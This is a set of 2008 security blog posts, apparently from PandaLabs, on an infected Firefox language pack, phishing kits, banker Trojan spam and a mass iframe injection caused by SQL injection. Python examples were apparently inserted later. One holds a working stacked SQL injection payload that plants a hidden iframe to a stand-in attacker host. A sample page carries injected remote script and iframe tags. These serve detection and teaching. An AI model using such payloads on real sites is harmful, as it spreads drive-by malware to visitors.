Firefox Vietnamese Language Pack Infected

Posted by Xabier Francisco at  08 May 08 06:54    

Mozilla has published on its blog an update on the incident with the Vietnamese language pack for Firefox 2.

In February, a Vietnamese language pack for Firefox was published. The problem was that it had already been infected before it was uploaded to the corresponding server: the *.xhtml files inside the pack had been modified to include the following instruction:

Files containing that malicious code are detected as W32/Xorer.T.

This instruction loads content from http://js.k0102.com/01.asp. At the time of writing this URL is offline, so it no longer delivers anything.

The question is: how can anyone be sure that their computer is free of malware?

You can check at http://www.infectedornot.com by scanning your computer with the ActiveScan 2.0 online scanner, a security solution based on 'collective intelligence', which allows many more threats to be detected.


Phishing & ScamPages Kits

Posted by Xabier Francisco at  07 May 08 05:26    

Nowadays, launching a phishing attack or creating a fake website for an online service is quite an easy task for anybody. No advanced technical knowledge or significant financial resources are needed.

Generally we tend to associate phishing only with fake websites of banking entities. However, there are also kits for other online services such as Gmail, Yahoo, YouTube, Fotolog, Hi5, etc., as we commented in a previous post.

Information, and even instructions on how to use these kits and carry out the attacks, can be found in forums, blogs, online videos, etc. Sometimes not only the instructions but the tools themselves are available for free.
 
Below you can see some examples of the availability of these kits:

The way these kits work is similar whether the attack is launched against a banking entity or any other service. Using a mass-mailing tool, a fake message that passes itself off as coming from the real entity or service is sent to a long list of email addresses. The message contains a link disguised to look like the legitimate URL (for example, the visible link text shows the real address) that actually points to a fake website imitating the original one.

If users are not aware of the fraud and enter their login credentials on that site, the information is sent by email to the cyber-crook or stored in a file at the cyber-crook's disposal.
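The disguised link in the message described above can be checked mechanically: an anchor whose visible text names one site while its href leads to another host is the tell-tale sign. The following is an added example for this page, not code from any phishing kit or from Panda; the sample message body and all host names in it are constructed for the illustration.

```python
"""Flag links in an HTML e-mail whose visible text claims one site while the
href actually leads to another. Added example, not the page's own code; the
sample message and every host name below are made up."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of a phishing e-mail body of the kind described above.
SAMPLE_EMAIL = """
<p>Dear customer, please confirm your details at
<a href="http://login.bank-example.com.evil-host.example/confirm">https://www.bank-example.com/login</a>
or at <a href="http://www.bank-example.com@198.51.100.7/">www.bank-example.com</a>.
Read our <a href="https://www.bank-example.com/help">help pages</a>.</p>
"""


def split_url(url):
    """urlsplit with a scheme forced on, so bare 'www.example' parses as a host."""
    return urlsplit(url if "://" in url else "http://" + url)


def host_of(url):
    return (split_url(url).hostname or "").lower()


def same_site(shown, real):
    """True when one host is the other or a subdomain of it (www.x.example vs x.example)."""
    return real == shown or real.endswith("." + shown) or shown.endswith("." + real)


def looks_like_url(text):
    """Visible text that a reader would take for an address (has a scheme or a dotted host)."""
    return "://" in text or (" " not in text and "." in text and not text.startswith("."))


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in the message."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def find_deceptive_links(html):
    """Return (visible text, href, reason) for each anchor whose text misrepresents its target."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.links:
        if not href or not looks_like_url(text):
            continue  # descriptive text ("help pages") may legitimately differ from the target
        reasons = []
        real = host_of(href)
        if "@" in split_url(href).netloc:
            # user:pass@host trick: everything before '@' is ignored by the browser
            reasons.append("userinfo before the real host")
        if not same_site(host_of(text), real):
            reasons.append("text host %s != link host %s" % (host_of(text), real))
        if reasons:
            findings.append((text, href, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for text, href, reason in find_deceptive_links(SAMPLE_EMAIL):
        print("%-40s -> %-55s %s" % (text, href, reason))
```

Run against the constructed message, the first two links are reported (a look-alike domain and the userinfo trick) and the "help pages" link is not, because plain descriptive text is allowed to point anywhere on the same site.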

 

Phishing attacks are also evolving, and they are no longer hidden only in domains similar to the legitimate ones. I recently read on Dancho Danchev's blog about a curious phishing attack against MySpace. In this case, the fake website is located in a profile on the legitimate MySpace domain, into which the cyber-crook has inserted a fake MySpace login page in order to obtain the credentials of unaware users who try to log in to see the contents of the profile.


2nd CARO Workshop

Posted by Luis Corrons at  02 May 08 11:37    

The 2nd CARO Workshop is currently taking place at the Crowne Plaza Hoofddorp in The Netherlands. This year's topic is Packers, Decryptors and Obfuscators, and some of the presentations are superb. The program is published here. While I'm writing this post, Mike Morgenstern and Andreas Marx, from AV-Test.org, are giving a speech about their Runtime Packer Testing Experiences.

In a few minutes we'll have three different talks about detection and blacklisting of packers, a topic that is both interesting and controversial.


Looks can be deceiving

Posted by ocavada at  30 April 08 06:00    

We have recently detected another spam message that contains a malicious URL. This is nothing new, but what if the message appears to come from a reliable source, such as a security company?

This is what has happened with a spam message that uses our free online analysis tool ActiveScan as bait to deceive users.

The following image shows the fake message the user would receive. Note that it carries our company's logo, but the link to the "analysis tool" points to a malicious URL, not to Panda's.


If the link is followed, a file called ScanActive.zip is downloaded, as can be seen in the image below:

 

This file is not our online analysis tool but a banker Trojan belonging to the Banbra family, specifically Banbra.FRJ, which is designed to steal confidential information related to certain Brazilian banking entities.

IFRAMES Attack !!! (Update II)

Posted by Xabier Francisco at  28 April 08 11:58    

The first thing we observed when we analysed the attack, in which an iframe pointing to a malicious website had been inserted into hundreds of thousands of web pages, was that all the compromised websites were hosted on servers running IIS and MSSQL. Initially, the most likely hypothesis was that some known exploit against one of these platforms was being used.

However, after a deeper analysis, we found that the cause was not a vulnerability in IIS or MSSQL Server but badly written ASP code, which allowed the websites hosted on these IIS/MSSQL servers to be compromised.

The ASP code shown below ("orderitem.asp") interacts with an MSSQL database by building its queries from user-supplied input, which allows SQL injection: an attacker can insert data into the database, and in this way the iframe was added to the content served by the hosted websites.

 

For security reasons, the complete ASP code has not been included.
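Since the vulnerable ASP is not reproduced here, the following added example (not the analysed orderitem.asp, and not Panda's code) reproduces the mechanism with SQLite from Python: a page that pastes a query-string parameter into its SQL text, a database driver that accepts several statements in one request (as Microsoft SQL Server does; simulated here by a small batch runner), and the parameterised version that stops the attack. The products table, the column that is rendered into web pages and the iframe URL are all assumptions; SQLite's `||` plays the role of T-SQL's `+` for string concatenation.

```python
"""Stored SQL injection of the kind described above, reproduced with SQLite.
Added example for this page, not the orderitem.asp that PandaLabs analysed.
Assumptions: a 'products' table whose 'description' column is rendered into
web pages, a driver that runs stacked statements, and a placeholder iframe URL."""
import sqlite3

# Placeholder for the injected element; the real attack's URL is not reproduced here.
INJECTED_IFRAME = '<iframe src="http://malicious.example/" width=0 height=0></iframe>'

# What an attacker sends as the 'id' query-string value: a valid id, then an
# extra statement that appends the iframe to every row the site will render.
PAYLOAD = "1; UPDATE products SET description = description || '" + INJECTED_IFRAME + "'"


def new_db():
    """In-memory stand-in for the site's MSSQL database (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget.');
        INSERT INTO products VALUES (2, 'Gadget', 'A handy gadget.');
    """)
    return con


def run_batch(con, sql):
    """Execute a ';'-separated batch and return every row it produces.
    Simulates a driver that accepts stacked queries; SQLite's own execute() does not."""
    rows = []
    for stmt in filter(str.strip, sql.split(";")):
        rows.extend(con.execute(stmt).fetchall())
    return rows


def order_item_vulnerable(con, item_id):
    """The bad pattern: untrusted input concatenated straight into the SQL text."""
    return run_batch(con, "SELECT name, description FROM products WHERE id = " + item_id)


def order_item_safe(con, item_id):
    """The fix: validate the type, then bind the value as a parameter."""
    if not item_id.isdigit():
        raise ValueError("invalid item id: %r" % item_id)
    return con.execute(
        "SELECT name, description FROM products WHERE id = ?", (int(item_id),)
    ).fetchall()


def descriptions(con):
    return [d for (d,) in con.execute("SELECT description FROM products ORDER BY id")]


if __name__ == "__main__":
    con = new_db()
    print("before:", descriptions(con))
    order_item_vulnerable(con, PAYLOAD)   # the page still renders item 1 normally...
    print("after: ", descriptions(con))   # ...but every description now carries the iframe
```

The vulnerable handler returns item 1 exactly as a legitimate request would, so nothing looks wrong to the visitor who triggered it; the damage is that every product description now contains the iframe and is served to all later visitors. The safe version rejects the payload before any SQL runs, and because the id is bound as a parameter rather than spliced into the text, even a value that passed validation could not add statements.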


IFRAMES Attack !!! (Update)

Posted by Xabier Francisco at  25 April 08 02:19    

This graph shows an example of the infection process, from the moment a user accesses a legitimate website that has been modified until the infection takes effect.

Thanks to Oscar and Olaiz for their collaboration.


IFRAMES Attack !!!

Posted by Xabier Francisco at  24 April 08 07:27    

Nowadays it is usually taken for granted that we can only get infected if we visit malicious websites or run files from untrustworthy sources. However, we have lately detected several cases in which, by exploiting vulnerabilities in web servers, malicious code is introduced into the websites hosted on them.

As a result, we may come across trustworthy websites that contain malicious code introduced by a cyber-crook.

The following is one piece of code we found inserted into certain websites:

Iframe 

It must be noted that, so far, approximately 282,000 websites contain this piece of code.

 

The injected element is an HTML iframe (inline frame): it tells the browser to load another document, from the URL in its src attribute, inside the page being viewed. Here that document redirects the browser to a web page or to the download of a malicious file, and because the frame is sized to be invisible the visitor notices nothing.

The instructions it contains are the following:

 

In this particular case, the user is transparently redirected to a URL that checks whether the system is vulnerable to certain known flaws. If one is found, the computer is infected with malware.

These are some of the vulnerabilities exploited to install malware on the computer:

MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution

MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution

MS07-018 Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution

MS07-033 Cumulative Security Update for Internet Explorer

MS07-055 Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution

This means that even when browsing only trusted websites, we can come across legitimate pages whose code has previously been modified to infect our computers.

That is why we recommend checking that your operating system is up to date.
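Both the iframe injection described in this post and the remote script inserted into the *.xhtml files of the Vietnamese language pack (top of this page) share one shape: an element that pulls content from a host the site does not own, often sized to be invisible. The following is an added example of how a site owner can check their own files for that pattern; it is not PandaLabs' or Mozilla's tooling, the sample page and every host name in it are constructed, and the hidden-size and display:none heuristics are this example's own assumptions about what injected frames look like.

```python
"""Scan HTML/XHTML files for embedded content loaded from another host, the
pattern of both the iframe injection above and the script inserted into the
language pack's *.xhtml files. Added example for this page, not vendor code;
the sample page and all host names are constructed."""
import os
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed page: a normal site with an injected hidden iframe and remote script.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/js/menu.js"></script>
<script src="http://js.attacker.example/01.asp"></script>
</head><body>
<p>Welcome to our shop.</p>
<iframe src="http://attacker.example/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<iframe src="https://www.shop.example/promo.html" width="300" height="100"></iframe>
</body></html>"""

EMBED_TAGS = ("iframe", "frame", "script", "embed", "object")


def is_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden frames: nobody is meant to see them."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = any(attrs.get(k, "").strip("\"'px") in ("0", "1") for k in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


def external(src, site_host):
    """True when src names a host other than the site or one of its subdomains."""
    host = (urlsplit(src).hostname or "").lower()
    if not host:
        return False  # relative URL, served by the site itself
    return host != site_host and not host.endswith("." + site_host)


class EmbedScanner(HTMLParser):
    """Records (line, tag, src, reason) for each embed that loads foreign or hidden content."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in EMBED_TAGS:
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src") or a.get("data")
        if not src:
            return
        reasons = []
        if external(src, self.site_host):
            reasons.append("external host")
        if tag in ("iframe", "frame") and is_hidden(a):
            reasons.append("hidden")
        if reasons:
            self.findings.append((self.getpos()[0], tag, src, ", ".join(reasons)))


def suspicious_embeds(html, site_host):
    scanner = EmbedScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def scan_tree(root, site_host):
    """Walk a document root (or an unpacked language pack) and report per file."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".xhtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = suspicious_embeds(f.read(), site_host)
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    for line, tag, src, reason in suspicious_embeds(SAMPLE_PAGE, "shop.example"):
        print("line %d: <%s src=%s> %s" % (line, tag, src, reason))
```

On the constructed page the local menu script and the same-site promo frame are ignored, while the remote script and the zero-sized external iframe are reported. A genuine third-party widget (an analytics script, an embedded video) will also be listed, so the output is a review list, not a verdict; the point is that an unexpected entry in it is exactly what the 282,000 compromised pages had in common.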


Kiss me!!!

Posted by ocavada at  16 April 08 01:06    

Several years ago, the main aim of cyber-crooks was to achieve notoriety with their creations, that is, to become famous. To do so, they wanted to attract as much attention as possible, and causing massive epidemics was their springboard to fame.

Their motivation has changed and is now purely economic. The best way to make money is to carry out malicious actions as stealthily as possible. Hiding malware with rootkits has become a common technique, as in the famous Stormworm family.

This trend has made malware creation become a very lucrative business.

However, we still come across samples as eye-catching as W32/MSNworm.EI.worm, which spreads via MSN Messenger and displays a funny picture of a little pig blowing us a kiss while it infects our computer:


Microsoft Updates for April

Posted by Ismael Briones at  09 April 08 12:34    

Five critical and three important updates have been released (MS08-018 to MS08-025). It's time to update your system if you haven't done so already.

The critical updates affect these components: Microsoft Project, GDI, the VBScript and JScript scripting engines, ActiveX kill bits and Internet Explorer. The DNS Client, the Windows kernel and Microsoft Visio are patched with important updates.

Most of them address remote code execution flaws, so don't forget to update your system as soon as possible.


You can find more information about the security bulletins by clicking the following link: MS08-April, Microsoft Security Bulletin Summary for April 2008.


You are nominated…to distribute malware!!! (II)

Posted by Xabier Francisco at  04 April 08 02:11    

Big Brother Brasil again. I am not very fond of this type of program, but spammers have made me pay attention to it.

Then we wondered who would be the next participant selected to distribute malware. We thought the selection would be made among the finalists. However, this time the candidate has been a female participant called "Juliana", who had already been evicted from the house.

 

These spam messages, which link to malicious websites, have subjects such as "Juliana do BBB do modo como você queria ver." ("Juliana from BBB the way you wanted to see her") or "Chegou um Vivo FotoTorpedo para voce !!!" ("A Vivo FotoTorpedo has arrived for you"), and invite us to view a video or photos of this participant. However, when the link in the message is followed (http://www.gallimard-jeunesse.fr/[Removed]/visualizer/Visualizar.php), we are redirected to a website from which the malware detected as Trj/Banbra.FPJ is downloaded:

This Trojan is designed to steal the affected users' credentials for several banking entities.

P.S.: If you are curious about who won Big Brother Brasil 2008, it was Rafhina.

